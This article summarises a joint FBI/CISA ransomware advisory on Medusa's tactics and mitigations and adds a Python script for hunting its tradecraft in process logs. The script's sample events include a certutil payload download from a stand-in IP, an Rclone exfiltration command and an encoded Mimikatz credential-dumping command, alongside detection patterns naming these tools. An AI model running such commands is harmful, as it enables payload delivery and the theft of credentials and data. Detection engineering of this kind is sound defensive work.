U.S. federal agencies, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA), together with the Multi-State Information Sharing and Analysis Center (MS-ISAC), have issued a joint advisory warning of a significant uptick in attacks by the Medusa ransomware. The advisory is part of the #StopRansomware initiative, which publishes the tactics, techniques, and indicators of known ransomware groups so that organizations can defend against them.
Medusa ransomware, a Ransomware-as-a-Service (RaaS) operation first identified in 2021, has targeted over 300 entities across industries including healthcare, education, legal, insurance, technology, and manufacturing. What makes these attacks particularly damaging is the double-extortion model: the victim's data is both encrypted and stolen, and the actors threaten to leak it publicly unless a ransom is paid. Unlike some RaaS operations, Medusa remains centrally run: the core group keeps strict control over ransom negotiations while recruiting affiliates to break into victims and deploy the malware in exchange for a share of the ransom payments.
Affiliates are offered potential payouts ranging from $100 USD to $1 million USD, with the opportunity to work exclusively for the operation. They rely on common intrusion techniques, chiefly phishing and exploitation of unpatched software, to obtain the initial foothold that the ransomware then spreads from. For a business, the consequences of a Medusa attack can include disrupted operations, legal ramifications from leaked data, regulatory fines, and reputational damage. For IT and security teams, these attacks expose the cost of unpatched systems and weak network segmentation.
Medusa actors gain initial access through phishing campaigns that steal user credentials and through exploitation of known vulnerabilities in internet-facing software, including ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788). Once inside, they use tools such as Advanced IP Scanner, PowerShell, and cmd.exe to enumerate the network and identify data worth stealing or encrypting, and they abuse legitimate remote monitoring and management (RMM) tools already present in the victim environment to move laterally without standing out from normal administrative traffic.
To stay undetected, Medusa actors obfuscate PowerShell, base64-encode their commands, and use built-in Windows utilities such as certutil to fetch and decode files in ways that slip past antivirus. They attempt to disable endpoint detection tools, add firewall rules to keep their access open, and run Mimikatz to harvest administrator credentials for lateral movement. Before encryption begins, they exfiltrate data with Rclone; the gaze.exe encryptor then locks files, appending the .medusa extension to each encrypted file.
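A small hunt over process-creation telemetry for the tradecraft just described, as an added example that is not part of the advisory or this article. The log format (one JSON object per line with host, image and cmdline fields, in the style of a Sysmon process-creation event), the field names, and every sample event are constructed for illustration, and the rule set is a starting point for a detection engineer rather than the advisory's own detections. The block decodes -EncodedCommand payloads (base64 over UTF-16LE, which is what PowerShell expects) so that the credential-dumping rule sees the real script rather than the encoded blob:

```python
"""
Hunt for Medusa-style tradecraft (encoded PowerShell, certutil ingress,
firewall rule creation, Mimikatz, Rclone, gaze.exe) in process-creation logs.
Added example, not from the advisory. Input is one JSON object per line with
"host", "image" and "cmdline" fields; the field names and all sample events
below are constructed for this example.
"""
import base64
import json
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common
# spellings are covered here. The payload is base64 of UTF-16LE text.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_powershell_enc(arg: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if it is not valid."""
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(event: dict) -> list:
    """Return (rule, detail) pairs that fire for one process-creation event."""
    image = _basename(event.get("image", ""))
    cmd = event.get("cmdline", "")
    searchable = cmd.lower()
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        m = _ENC_RE.search(cmd)
        if m:
            decoded = decode_powershell_enc(m.group(1))
            hits.append(("encoded_powershell", decoded or "undecodable payload"))
            if decoded:
                # Let the remaining rules inspect the decoded script, not just the blob.
                searchable += " " + decoded.lower()
    if image == "certutil.exe" and ("-urlcache" in searchable or "-decode" in searchable):
        hits.append(("certutil_ingress_or_decode", cmd))
    if image == "netsh.exe" and "advfirewall" in searchable and "add rule" in searchable:
        hits.append(("firewall_rule_added", cmd))
    if "mimikatz" in searchable or "sekurlsa::" in searchable:
        hits.append(("credential_dumping", cmd))
    if image == "rclone.exe":
        hits.append(("rclone_exfiltration", cmd))
    if image == "gaze.exe":
        hits.append(("medusa_encryptor", cmd))
    return hits


def scan(lines) -> list:
    """Parse JSON log lines and return a flat list of findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry is skipped, not fatal
        for rule, detail in check_event(event):
            findings.append({"host": event.get("host", "?"), "rule": rule, "detail": detail})
    return findings


# Constructed sample telemetry (not real data). The encoded command is built
# here so the sample is a genuine UTF-16LE/base64 blob as PowerShell would get it.
_ENCODED = base64.b64encode("Invoke-Mimikatz -DumpCreds".encode("utf-16le")).decode()
_SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"host": "WS02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/svc.exe C:\Users\Public\svc.exe"},
    {"host": "SRV01", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389'},
    {"host": "SRV01", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance remote:exfil --transfers 8"},
    {"host": "SRV01", "image": r"C:\Users\Public\gaze.exe", "cmdline": r"gaze.exe"},
    {"host": "WS03", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\iso\win.iso SHA256"},
]
SAMPLE_LOGS = "\n".join(json.dumps(e) for e in _SAMPLE_EVENTS)

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS.splitlines()):
        print(f"{f['host']:6} {f['rule']:28} {f['detail'][:70]}")
```

The two benign events (a signed script run with -ExecutionPolicy, and certutil computing a hash) produce no findings, which is the point of matching on the specific switches rather than on the binary name alone; in a real environment the gaze.exe and rclone.exe rules would be joined with a file-hash or signer check, since the attacker controls the file name.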
Business leaders and IT teams are advised to act now to prevent a Medusa ransomware attack or limit its impact. Concretely, that means patching the known exploited vulnerabilities, segmenting networks to contain lateral movement, restricting inbound connections from unknown sources, enforcing multifactor authentication, monitoring for abnormal activity such as unexpected use of scanning or remote management tools, disabling remote management tools that are not in use, keeping offline backups that an attacker on the network cannot reach, training employees to recognize phishing emails, and rehearsing incident response plans so the organization is ready when an intrusion is detected.
The rise in ransomware attacks, Medusa among them, highlights the growing threat to critical infrastructure and major business sectors. These attacks are not only an IT problem but a significant business risk that can disrupt operations and supply chains and expose sensitive data. Executive teams are urged to conduct ransomware risk assessments, ensure critical patches are applied, review incident response plans, and stay informed about the latest threats through collaboration with law enforcement and industry groups.